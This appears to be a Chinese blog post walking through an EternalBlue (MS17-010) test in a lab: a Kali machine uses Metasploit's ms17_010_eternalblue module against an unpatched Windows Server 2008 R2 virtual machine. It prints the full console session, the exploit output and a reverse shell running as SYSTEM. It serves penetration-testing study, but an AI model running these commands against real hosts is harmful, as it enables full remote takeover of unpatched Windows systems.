使用Metasploit测试win08虚拟机是否存在永恒之蓝漏洞
来源:互联网 发布:郑州最专业seo公司 编辑:程序博客网 时间:2024/05/04 09:53
永恒之蓝(英语:EternalBlue)是美国国家安全局开发的漏洞利用程序,于2017年4月14日被黑客组织影子掮客泄漏。
尽管微软于2017年3月14日发布操作系统补丁修补了这个漏洞,5月12日WannaCry勒索软件利用这个漏洞传播时,很多Windows用户仍然没有安装补丁。
由于WannaCry的严重性,微软于2017年5月13日为已超过支持周期的Windows XP、Windows 8和Windows Server 2003发布了紧急安全更新,以阻止WannaCry的传播。
2017年6月27日,勒索软件Petya的变种同样利用永恒之蓝的漏洞,发动一次全球性的网络攻击。(来自维基百科)
攻击机:192.168.68.137 (kali linux2.0)
靶机:192.168.68.136(windows server 2008 R2 未安装相关补丁并关闭防火墙 )
本次使用的模块:exploit/windows/smb/ms17_010_eternalblue
命令解析:
msfconsole:启动Metasploit命令行界面
search:搜索相关ms17_010模块
use:使用相关模块
show options:查看需要设置的参数
set rhost :设置靶机地址
exploit:执行攻击或测试
root@xw:~# msfconsole
=[ metasploit v4.16.18-dev ]
+ -- --=[ 1703 exploits - 969 auxiliary - 299 post ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > search ms17_010
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf exploit(ms17_010_eternalblue) > set rhost 192.168.68.136
rhost => 192.168.68.136
msf exploit(ms17_010_eternalblue) > exploit
#以下为自动化测试过程
[*] Started reverse TCP handler on 192.168.68.137:4444
[*] 192.168.68.136:445 - Connecting to target for exploitation.
[+] 192.168.68.136:445 - Connection established for exploitation.
[+] 192.168.68.136:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.68.136:445 - CORE raw buffer dump (53 bytes)
[*] 192.168.68.136:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.68.136:445 - 0x00000010 30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65 008 R2 Datacente
[*] 192.168.68.136:445 - 0x00000020 72 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 r 7601 Service P
[*] 192.168.68.136:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 192.168.68.136:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.68.136:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.68.136:445 - Sending all but last fragment of exploit packet
[*] 192.168.68.136:445 - Starting non-paged pool grooming
[+] 192.168.68.136:445 - Sending SMBv2 buffers
[+] 192.168.68.136:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.68.136:445 - Sending final SMBv2 buffers.
[*] 192.168.68.136:445 - Sending last fragment of exploit packet!
[*] 192.168.68.136:445 - Receiving response from exploit packet
[+] 192.168.68.136:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.68.136:445 - Sending egg to corrupted connection.
[*] 192.168.68.136:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.68.137:4444 -> 192.168.68.136:51569) at 2017-11-27 15:03:06 +0800
[+] 192.168.68.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.68.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.68.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#反弹的shell
Microsoft Windows [▒汾 6.1.7601]
▒▒Ȩ▒▒▒▒ (c) 2009 Microsoft Corporation▒▒▒▒▒▒▒▒▒▒Ȩ▒▒
C:\Windows\system32>whoami
whoami
nt authority\system
阅读全文
0 0
- 使用Metasploit测试win08虚拟机是否存在永恒之蓝漏洞
- 永恒之蓝漏洞紧急应对方案
- 永恒之蓝(EternalBlue)漏洞利用实例
- ms17-010-永恒之蓝漏洞
- 【漏洞分析】MS17-010:深入分析“永恒之蓝”漏洞
- “永恒之蓝"漏洞的紧急应对--毕业生必看
- Windows勒索病毒“永恒之蓝”漏洞补丁包
- 永恒之蓝
- 永恒之蓝补丁
- Metasploit的Docker安装及其Eternal Blue(永恒之蓝)渗透实现
- win08使用
- 漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010
- 永恒之蓝病毒引发的勒索病毒感染,Windows系统安全漏洞修复
- 关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用
- 干货分享|Linux版“永恒之蓝”远程代码执行漏洞技术分析
- 一个利用“永恒之蓝”漏洞传播的挖矿程序分析
- 电脑病毒之随便聊聊--永恒之蓝
- 渗透测试之学习使用metasploit
- OpenCV初体验的路径问题
- Hbase_JAVA api
- mysql 语句
- Gluster简单加密xlator rot-13模块的测试
- 如何下载linux(ubuntu)相关源码
- 使用Metasploit测试win08虚拟机是否存在永恒之蓝漏洞
- react---手动环境配置
- int与Integer的区别
- 希尔排序-c语言实现
- java泛型的通配符
- idea配置
- opencv_tutorial_code学习——opencv1语句
- 图的实现(带有深度/广度优先遍历/最小生成树算法)
- ListView点击后不响应